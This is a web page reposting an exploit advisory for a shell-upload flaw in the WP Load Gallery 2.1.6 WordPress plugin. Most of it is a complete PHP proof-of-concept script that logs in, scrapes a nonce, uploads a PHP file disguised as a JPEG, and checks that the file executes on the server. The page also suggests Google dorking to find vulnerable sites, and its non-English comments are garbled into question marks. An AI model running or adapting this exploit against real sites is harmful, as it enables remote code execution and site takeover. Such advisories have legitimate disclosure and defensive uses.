Latest Tech

Latest Posts

 

 

WP Load Gallery 2.1.6 Shell Upload

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 220
WP Load Gallery 2.1.6 Shell Upload
WP Load Gallery 2.1.6 Shell Upload
=============================================================================================================================================
| # Title : WP Load =============================================================================================================================================
| # Title : WP Load Gallery plugin v2.1.6 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://wphive.com/plugins/wp-load-gallery/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] vulnerability found in WP Load Gallery plugin version 2.1.6 & suffers from a remote shell upload vulnerability.

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php -u <URL> -un <USERNAME> -p <PASSWORD>

[+] PayLoad :

<?php
// ????? ??? ???????? ?????? - ???? ????? ???
$target_url = $argv[1] ?? '';
$username = $argv[2] ?? '';
$password = $argv[3] ?? '';

if (!$target_url || !$username || !$password) {
die("Usage: php script.php <url> <username> <password>\n");
}

$target_url = rtrim($target_url, '/');
$login_url = "$target_url/wp-login.php";
$gallery_url = "$target_url/wp-admin/admin.php?page=wp-load-gallery";
$ajax_url = "$target_url/wp-admin/admin-ajax.php";
$shell_filename = "indoushka.php";
$shell_path = "$target_url/wp-content/uploads/2025/02/$shell_filename";
$shell_content = "<?php echo 'Hello, Security Test!'; ?>";
$user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0";

// ?????? ?? ???? ???????
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$target_url/wp-content/plugins/wp-load-gallery/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code !== 200) {
die("[!] WP Load Gallery ??? ???? ?? ??? ????.\n");
}

// ????? ??? ???????
file_put_contents($shell_filename, $shell_content);

// ????? ??????
$login_data = [
"log" => $username,
"pwd" => $password,
"rememberme" => "forever",
"wp-submit" => "Log In"
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$response = curl_exec($ch);
curl_close($ch);

if (!strpos($response, 'dashboard')) {
die("[!] ??? ????? ??????.\n");
}

echo "[+] ????? ?????? ????.\n";

// ??????? wplg_nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $gallery_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$response = curl_exec($ch);
curl_close($ch);

if (preg_match('/"wplg_nonce"\s*value="(\w+)"/', $response, $matches)) {
$wplg_nonce = $matches[1];
echo "[+] ?? ??????? wplg_nonce: $wplg_nonce\n";
} else {
die("[!] ??? ??????? wplg_nonce.\n");
}

// ??? ?????
$upload_data = [
"wplg_nonce" => $wplg_nonce,
"action" => "wpgallery",
"wplg_gallery_id" => "205",
"task" => "wplg_upload",
"wplg_gallery_file[]" => new CURLFile($shell_filename, "image/jpeg", $shell_filename)
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $upload_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, 'status') !== false) {
echo "[+] ?? ??? ????? ?????!\n";
echo "[+] ?????? ?? ???? ????? ???: $shell_path\n";

// ?????? ?? ???? ?????
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $shell_path);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, 'Hello, Security Test!') !== false) {
echo "[+] ?? ??? ????? ????? ??? ????!\n";
} else {
echo "[!] ????? ??? ????? ?? ?? ???? ??? ?? ?????.\n";
}
} else {
echo "[!] ??? ??? ?????? ?????? ?????? ??????.\n";
}
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© 2025 Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.